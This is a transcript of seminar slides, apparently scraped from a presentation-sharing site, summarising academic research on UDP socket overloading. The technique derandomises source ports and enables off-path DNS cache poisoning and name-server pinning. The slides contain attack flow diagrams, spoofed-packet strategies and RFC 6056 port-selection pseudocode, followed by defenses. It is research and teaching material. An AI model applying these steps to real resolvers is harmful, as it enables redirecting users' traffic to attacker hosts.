1 / 25

Socket Overloading for Fun and Cache-Poisoning

29 th Annual Computer Security Applications Conference (ACSAC 2013). Socket Overloading for Fun and Cache-Poisoning. Amir Herzberg 1 ; Haya Shulman 2 1 Bar Ilan University 2 Technische Universität Darmstadt/EC-SPRIDE. 左昌國 2013/12/10 Seminar @ ADLab , CSIE, NCU. Outline.

kasi
Download Presentation

Socket Overloading for Fun and Cache-Poisoning

An Image/Link below is provided (as is) to download presentation Download Policy: Content on the Website is provided to you AS IS for your information and personal use and may not be sold / licensed / shared on other websites without getting consent from its author. Content is provided to you AS IS for your information and personal use only. Download presentation by click this link. While downloading, if for some reason you are not able to download a presentation, the publisher may have deleted the file from their server. During download, if you can't get a presentation, the file might be deleted by the publisher.

E N D

Presentation Transcript

  1. 29thAnnual Computer Security Applications Conference (ACSAC 2013) Socket Overloading for Fun and Cache-Poisoning Amir Herzberg1; HayaShulman2 1Bar IlanUniversity 2Technische Universität Darmstadt/EC-SPRIDE 左昌國 2013/12/10 Seminar @ ADLab, CSIE, NCU

  2. Outline • Introduction • Socket Overloading • Evaluation • Port Derandomization via Socket Overloading • Socket-Overloading for Attacks on DNS • Defenses and Conclusions

  3. Introduction • What is DNS • Ref: http://www.csie.ncu.edu.tw/~hsufh/COURSES/FALL2013/14_dns.ppt • Ref: Steve Friedl, http://unixwiz.net/techtips/iguide-kaminsky-dns-vuln.html • Attacks on DNS (categorized by position of attackers) • Man-in-the-Middle • Less than 3% of DNS resolvers enforce strict DNSSEC (cryptographic) • Off-path attacks

  4. Introduction • Basic cache-poisoning (without any defense mechanism) Attacker Server “6.6.6.6” (3) response “www.foo.com” == “6.6.6.7” TTL = 1 year Name Server “ns.foo.com” Resolver (1) query IP for “www.foo.com” (2) query IP for “www.foo.com” (4) response “6.6.6.7” Attacker Server “6.6.6.7” (5) access to “www.foo.com” == “6.6.6.7” Victim

  5. Introduction – DNS Security • Challenge-Response Defenses (to off-path attacks) • Standardized challenges [RFC5452] • DNS transaction ID (TXID) field • Source port randomization (DJBDNS) • Port randomization algorithms [RFC6056] (Best Current Practice) • IP address randomization • Cryptographic Defense (DNSSEC)

  6. Introduction • Attacking model

  7. Introduction – Related Work • Off-Path Port Derandomization Attacks • A. Herzberg and H. Shulman. “Security of Patched DNS”, Computer Security - ESORICS 2012 • Off-Path IP Address Derandomization Attacks • A. Herzberg and H. Shulman. “Security of Patched DNS”, Computer Security - ESORICS 2012 • O. Gudmundsson and S. D. Crocker. Observing DNSSEC Validation in the Wild. In SATIN 2011

  8. Socket Overloading • The target • To discover the client’s (ephemeral) port in its communication to the name server • Interrupt Driven Packet Handling • Unix and Windows use hardware interrupts for event notification purpose (input/output on hardware) • NICs generate interrupts to notify the kernel of arrival of new packets • These interrupts disrupt protocol processing • Under high traffic load, the socket may fill up, and subsequent packets will be dropped

  9. Socket Overloading for Port Discovery Off-path Attacker 6.6.6.6 NS 5.6.7.8 Client 1.2.3.6 Resolver 1.2.3.4 (1) (2) Burst of N packets (3) loss Timeout retransmission (4) (5) (6) Report response time

  10. Evaluation

  11. Evaluation

  12. Port Derandomization via Socket Overloading • In RFC-6056 • 5 algorithms to perform port randomization • Algorithm #1 and #2 • Do not vulnerable to socket overloading • Vulnerable to attacks in [12] • Algorithm #3 – Simple Hash-Based Port Selection • Algorithm #4 – Double-Hash Port Selection • Algorithm #5 – Random-Increments Port Selection

  13. Alg. #3 – Simple Hash-Based Port Selection /* Initialization at system boot time. Could be random. */ next_ephemeral= 0; /* Ephemeral port selection function */ num_ephemeral= max_ephemeral - min_ephemeral + 1; offset = F(local_IP, remote_IP, remote_port, secret_key); count = num_ephemeral; do { port = min_ephemeral + (next_ephemeral + offset) % num_ephemeral; next_ephemeral++; if(check_suitable_port(port)) return port; count--; } while (count > 0); return ERROR;

  14. Port Derandomization via Socket Overloading Off-path Attacker 6.6.6.6 NS 5.6.7.8 Client 1.2.3.6 Resolver 1.2.3.4 Measure response latency δ (1) DNS Request srcPort : x DNS Request srcPort : y (2) (3) t = 0 UDP Packet dstPort : z Burst of N UDP packets to port z DNS Response dstPort : x DNS Response dstPort : y (4) Response Latency t = τ UDP Packet dstPort : z (5) Response latency t = τ If τ >δ, then z == y Else repeat with port = z - 1

  15. Port Derandomization via Socket Overloading

  16. Alg. #4 – Double-Hash Port Selection /* Initialization at system boot time */ for(i = 0; i < TABLE_LENGTH; i++) table[i] = random() % 65536; /* Ephemeral port selection function */ num_ephemeral = max_ephemeral - min_ephemeral + 1; offset = F(local_IP, remote_IP, remote_port, secret_key1); index = G(local_IP, remote_IP, remote_port, secret_key2); count = num_ephemeral; do { port = min_ephemeral + (offset + table[index]) % num_ephemeral; table[index]++; if(check_suitable_port(port)) return port; count--; } while (count > 0); return ERROR;

  17. Alg. #5 – Random-Increments Port Selection /* Initialization code at system boot time. */ next_ephemeral = random() % 65536; /* Initialization value */ N = 500; /* Determines the trade-off */ /* Ephemeral port selection function */ num_ephemeral = max_ephemeral - min_ephemeral + 1; count = num_ephemeral; do { next_ephemeral = next_ephemeral + (random() % N) + 1; port = min_ephemeral + (next_ephemeral % num_ephemeral); if(check_suitable_port(port)) return port; count--; } while (count > 0); return ERROR;

  18. Alg. #5 – Random-Increments Port Selection • Birthday Protection • Birthday attack requires multiple requests and multiple responses no sending multiple concurrent requests for the same queries • How to circumvent Birthday Protection? • N DNS requests • j.foo.org where ( 0 <= j <= N) • Not the same host  pass the protection • Then the socket overloading attack for the correct port

  19. Port Derandomization via Socket Overloading

  20. Socket-Overloading for Attacks on DNS • DNS Cache Poisoning • NS Pinning via Resolver Socket-Overloading • NS Pinning via Name Server Socket-Overloading

  21. Socket-Overloading for Attacks on DNS – DNS Cache Poisoning Client 1.2.3.6 Resolver 1.2.3.4 Off-path Attacker 6.6.6.6 NS 5.6.7.8 (1) (2) (3) (4) 216 spoofed DNS responses for each TXID value Response with correct TXID is cached (5) Response ignored since no matching pending request

  22. Socket-Overloading for Attacks on DNS – DNS Cache Poisoning Proxy Resolver 1.2.3.4 Upstream Resolver 8.8.8.8 Client 1.2.3.6 Off-path Attacker 6.6.6.6 (1) (2) query (3) response (4) response (5) drop Burst of N spoofed packets to port 65000 If correct port is hit in (4), then time-out, and retransmission

  23. Socket-Overloading for Attacks on DNS – NS Pinning via Resolver Socket-Overloading Off-path Attacker 6.6.6.6 NS 5.6.7.8 Client 1.2.3.6 Resolver 1.2.3.4 (1) (2) Burst of N Packets to a known port (3) loss Timeout retransmission Repeat step (2) after a t secs (4)

  24. Socket-Overloading for Attacks on DNS – NS Pinning via NS Socket-Overloading Off-path Attacker 6.6.6.6 NS 5.6.7.8 Client 1.2.3.6 Resolver 1.2.3.4 (1) (2) Burst of N Packets loss (3) Timeout retransmission Burst of N Packets loss (4)

  25. Defense and Conclusions • Defense • DNSSEC • Full port randomization • Avoid per-destination sequential port allocation • Conclusions • A new attack tool – UDP socket overloading • Cache poisoning • NS pinning • The results show that per-destination ports’ assignment [RFC6056] is vulnerable

More Related